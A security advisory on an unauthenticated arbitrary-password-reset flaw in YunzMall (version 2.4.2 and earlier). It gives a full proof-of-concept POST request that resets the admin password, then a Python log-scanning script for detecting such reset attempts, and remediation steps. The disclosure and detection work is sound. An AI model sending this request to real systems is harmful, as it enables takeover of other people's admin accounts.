YunzMall has an Arbitrary User Password Reset Vulnerability

BUG_Author:

glzjin

 

Affected version:

≤2.4.2

 

Vendor:

http://yunzmall.com/

 

Software:

http://yunzmall.com/

 

Vulnerability File:

  • /app/platform/controllers/ResetpwdController.php

 

Description:

1. In /app/platform/controllers/ResetpwdController.php there is an endpoint that can be reached without authentication and that lets the caller set a new password for any user.

2. So we can send the following request to that endpoint to reset the admin account's password:

POST /admin/changePwd HTTP/1.1
Host: hz.lab.wetolink.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=isfrf9v0tfs5jrjm2lohqk4uuu; laravel_session=P6MP2ICdiNnDzgO2ZtyeQqqzInAhKmyeTzN9HQHK
Content-Length: 54

username=admin&pwd=Hacked123!%40%23&mobile=13800138001

3. We can now log in as the admin user with the new password.
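For administrators who want to check whether this endpoint was hit on an exposed instance, the following is an added example; it is not part of the original advisory and not code from the YunzMall project. It scans web-server access logs in the common Nginx/Apache combined log format for POST requests to /admin/changePwd (the path named in the advisory) and reports client IPs, timestamps and response codes. The log lines are constructed for illustration, and both the log format and the assumption that a successful reset is answered with a 2xx or 3xx status are assumptions, not something the advisory states.

```python
import re
from collections import Counter

# Combined log format (assumed):
#   ip - user [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

RESET_PATH = "/admin/changePwd"  # endpoint named in the advisory

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jun/2020:10:00:01 +0800] "GET /admin HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Jun/2020:10:00:05 +0800] "POST /admin/changePwd HTTP/1.1" 200 87 "-" "python-requests/2.23"
203.0.113.10 - - [01/Jun/2020:10:00:09 +0800] "POST /admin/login HTTP/1.1" 302 0 "-" "python-requests/2.23"
198.51.100.7 - - [01/Jun/2020:10:02:00 +0800] "POST /admin/changePwd?x=1 HTTP/1.1" 500 120 "-" "curl/7.68"
192.0.2.25 - - [01/Jun/2020:10:05:00 +0800] "GET /admin/changePwd HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_reset_attempts(lines):
    """Return every POST to the reset endpoint; the query string is ignored
    so that variants such as /admin/changePwd?x=1 are still caught."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path == RESET_PATH:
            rec["status"] = int(rec["status"])
            # Assumption: a reset that went through is answered with 2xx/3xx,
            # while a 4xx/5xx indicates the attempt was rejected or errored.
            rec["likely_success"] = 200 <= rec["status"] < 400
            hits.append(rec)
    return hits


def summarize(hits):
    """Count reset attempts per client IP, and likely successes separately."""
    attempts = Counter(h["ip"] for h in hits)
    successes = Counter(h["ip"] for h in hits if h["likely_success"])
    return attempts, successes


if __name__ == "__main__":
    found = find_reset_attempts(SAMPLE_LOG.splitlines())
    for h in found:
        flag = "LIKELY SUCCESS" if h["likely_success"] else "failed/error"
        print(f"{h['time']}  {h['ip']:<15} {h['status']}  {flag}")
    per_ip, ok_per_ip = summarize(found)
    print("attempts per IP:", dict(per_ip))
    print("likely successes per IP:", dict(ok_per_ip))
```

Any hit flagged as a likely success on an instance running version 2.4.2 or earlier should be treated as a possible compromise of the named account: rotate the admin password, review what that IP did afterwards, and upgrade before re-exposing the admin panel.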